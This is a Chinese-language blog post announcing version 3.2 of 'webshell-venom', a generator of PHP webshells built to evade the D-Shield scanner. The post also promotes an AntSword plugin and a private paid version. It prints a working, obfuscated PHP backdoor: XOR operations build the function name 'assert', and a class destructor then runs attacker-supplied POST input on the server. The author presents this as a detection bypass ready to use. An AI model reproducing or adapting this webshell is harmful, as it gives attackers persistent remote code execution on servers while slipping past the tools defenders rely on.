前言
感谢大家对webshell-venom的支持
星球自开启以来已经源源不断有各路大佬加入
并且一起交流了很多的思路跟想法
为了不辜负大家的期望
自己这几天一大早上就起来写脚本发文章,基本上星球里都是一天两更
项目在今天也达到了700个星
所以特地推出webshell-venom 3.2版本
webshell-venom 3.2 的蚁剑插件版也已经在蚁剑商店上市
原来已经有的点击更新即可
3.2是github公开版,所有人都可以下载
(webshell-venom 3.x系列 不支持php7环境,如果需要星球内部版4.0请点击下面链接)
https://yzddmr6.tk/posts/webshell-venom-notice/
正文
样例
其实我当时还纠结是命名为3.2还是3.3
因为在 https://yzddmr6.tk/2019/08/13/webshell-venom-3-1-3-2/
这篇帖子里虽然说了3.2的更新,但是实际上并没有发布
后来研究了一下还可以用另一种方式绕过
就是套一个函数,把异或的返回值通过类里的函数进行传递。
具体的可以看一下下面的代码
<?php
class TIPD{
function AJZN(){
$upf='Q'^"\x30";
$imp='R'^"\x21";
$rec='u'^"\x6";
$yba='/'^"\x4a";
$ebi=':'^"\x48";
$pvu='D'^"\x30";
$VDMX=$upf.$imp.$rec.$yba.$ebi.$pvu;
return $VDMX;}function __destruct(){
$UNOF=$this->AJZN();
@$UNOF($this->FJ);}}
$tipd=new TIPD();
@$tipd->FJ=isset($_GET['id'])?base64_decode($_POST['mr6']):$_POST['mr6'];
?>
因为我说过D盾其实还是不认识异或的,至少还是不敏感。
用类里函数传参的方法也是一个很好的手段。
绕过的办法有很多,我只是提供一个demo。
使用方法
https://github.com/yzddmr6/webshell-venom/tree/master/php
蚁剑插件
老套路,直接生成
过盾截图
一键免杀D盾
更新后效果还不错,但是缺点就是有点长。。。
最后
免杀这一块不同于其他工具
其实很多人都有很好的方法,只不过是大家都不愿意分享
因为看看论坛里的帖子大家就会发现一个真理
分享就意味着失效
我分享出来也是为了让大家能开阔思路,更进一步
建立圈子也是为了创造一个更好的交流环境。共同提高
项目地址
https://github.com/yzddmr6/webshell-venom
